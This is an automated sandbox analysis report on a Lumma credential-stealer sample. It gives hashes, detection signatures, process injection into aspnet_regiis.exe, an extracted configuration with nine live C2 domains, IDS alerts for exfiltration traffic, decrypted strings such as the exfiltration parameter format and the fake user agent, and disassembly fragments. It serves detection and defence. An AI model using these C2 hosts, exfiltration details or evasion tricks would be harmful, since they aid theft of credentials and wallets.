Edit tour

Windows Analysis Report
ReploidReplic.exe

Overview

General Information

Sample name:	ReploidReplic.exe
Analysis ID:	1582548
MD5:	7db52dda50a584c20d69a00d2b13c63d
SHA1:	12ed1950ad08b2e0dea8442d95b33e03de68ca8d
SHA256:	0b571a24307780dc181fd657ee4a9d4fca6a4b2076636d793d906944e3a71e2e
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

ReploidReplic.exe (PID: 2312 cmdline: "C:\Users\user\Desktop\ReploidReplic.exe" MD5: 7DB52DDA50A584C20D69A00D2B13C63D)

conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 2492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 6732 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "ingreem-eilish.biz", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "rabidcowse.shop", "framekgirus.shop", "abruptyopsn.shop"], "Build id": "HpOoIh--73f82eed6521"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ReploidReplic.exe PID: 2312	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2492	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2492	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2492	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:09:05.263405+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.48.1	443	TCP
2024-12-30T21:09:06.446062+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.48.1	443	TCP
2024-12-30T21:09:07.725901+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.48.1	443	TCP
2024-12-30T21:09:10.474876+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.48.1	443	TCP
2024-12-30T21:09:11.745125+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.48.1	443	TCP
2024-12-30T21:09:13.309211+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.48.1	443	TCP
2024-12-30T21:09:14.157571+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.48.1	443	TCP
2024-12-30T21:09:15.787491+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:09:05.918183+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.48.1	443	TCP
2024-12-30T21:09:06.943164+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.48.1	443	TCP
2024-12-30T21:09:16.303469+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49746	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:09:05.918183+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:09:06.943164+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.48.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:09:13.619577+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.48.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://abruptyopsn.shop/apil	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/api3L	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/api	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/Y	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/Q	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop:443/api	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/s	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/apiF9	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/apiHP2	Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.aspnet_regiis.exe.8a0000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "ingreem-eilish.biz", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "rabidcowse.shop", "framekgirus.shop", "abruptyopsn.shop"], "Build id": "HpOoIh--73f82eed6521"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: ReploidReplic.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ReploidReplic.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ingreem-eilish.biz
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp	String decryptor: HpOoIh--73f82eed6521

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_008B9362 CryptUnprotectData,

2_2_008B9362

Source: ReploidReplic.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: ReploidReplic.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbo source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER1976.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1976.tmp.dmp.5.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\ReploidReplic.PDB source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER1976.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Users\user\Desktop\ReploidReplic.PDBB source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb\ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then mov ecx, eax	0_2_0083B800
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]	0_2_0085CC30
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	0_2_00827E40
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_2_00827E40
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	0_2_00835840
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_008235E0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]	0_2_00848730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]	2_2_008C6000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]	2_2_008AC22D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	2_2_008DFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp], ecx	2_2_008B9362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	2_2_008E0480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]	2_2_008DDCE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_008DDCE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_008CBE8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	2_2_008CBE8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], dl	2_2_008ADE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, edx	2_2_008A8640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	2_2_008B5882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	2_2_008B5882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h	2_2_008D98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh	2_2_008D90A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], dl	2_2_008CC0CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF0CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_008DD818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h	2_2_008B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_008B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	2_2_008CA050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]	2_2_008DE051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]	2_2_008DE850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_008DE19A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], dl	2_2_008CC1A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]	2_2_008DC1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	2_2_008C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_008C29CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008C29CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008AB9F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008C8100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	2_2_008E0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh	2_2_008B6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]	2_2_008B6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_008B6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_008B6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], dl	2_2_008CC140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edi], cx	2_2_008C895A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_008C895A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_008C4974
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	2_2_008C4974
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]	2_2_008DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_008CC282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	2_2_008CC282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_008C9A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF2F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_008CC26C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	2_2_008CC26C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edi], ax	2_2_008BCA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edi], ax	2_2_008BCA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]	2_2_008C3A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]	2_2_008DE262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_008CBA79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], dl	2_2_008C238D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_008C238D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]	2_2_008BC3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	2_2_008A73C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	2_2_008A73C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then test eax, eax	2_2_008D93D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push esi	2_2_008C0BD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008C6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]	2_2_008C6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_008A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	2_2_008C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	2_2_008C1C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	2_2_008B6C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	2_2_008C74A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]	2_2_008C7CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_008C7CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_008D5410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, eax	2_2_008DC440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	2_2_008DF450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]	2_2_008D9C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_008BAD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	2_2_008B4DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	2_2_008B55DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	2_2_008B6C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ecx	2_2_008DC510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then test eax, eax	2_2_008DC510
